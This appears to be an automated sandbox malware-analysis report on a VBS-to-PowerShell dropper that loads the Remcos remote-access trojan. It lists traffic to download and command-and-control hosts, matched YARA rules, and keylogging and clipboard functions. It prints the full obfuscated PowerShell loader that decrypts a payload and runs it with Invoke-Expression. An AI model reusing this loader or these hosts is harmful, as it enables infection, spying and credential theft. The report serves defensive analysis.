                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0041B380
                  Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/glo/KBV.txt HTTP/1.1Host: 192.3.176.154Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: 2024remcmon.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000002.00000002.1264396222.0000024623A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.154
                  Source: powershell.exe, 00000002.00000002.1264396222.0000024623A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.154/xampp/glo/KBV.txt
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1363407451.000002463B8A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                  Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2488829216.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
                  Source: powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: wscript.exe, 00000000.00000003.1207989484.000001C7DAF7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208263755.000001C7DAF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m0L
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246235C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246235C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000004_2_0040A2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_004168C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_0040A3E0

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C9E2 SystemParametersInfoW,4_2_0041C9E2

                  System Summary

                  barindex
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_004167B4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E0CC4_2_0043E0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F0FA4_2_0041F0FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004541594_2_00454159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004381684_2_00438168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004461F04_2_004461F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E2FB4_2_0043E2FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045332B4_2_0045332B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042739D4_2_0042739D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004374E64_2_004374E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E5584_2_0043E558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004387704_2_00438770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004378FE4_2_004378FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004339464_2_00433946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044D9C94_2_0044D9C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00427A464_2_00427A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041DB624_2_0041DB62
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00427BAF4_2_00427BAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00437D334_2_00437D33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00435E5E4_2_00435E5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00426E0E4_2_00426E0E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043DE9D4_2_0043DE9D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00413FCA4_2_00413FCA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436FEA4_2_00436FEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                  Source: createactiveimagesbeautygirlfrnd.gIF.vbsInitial sample: Strings found which are bigger than 50
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
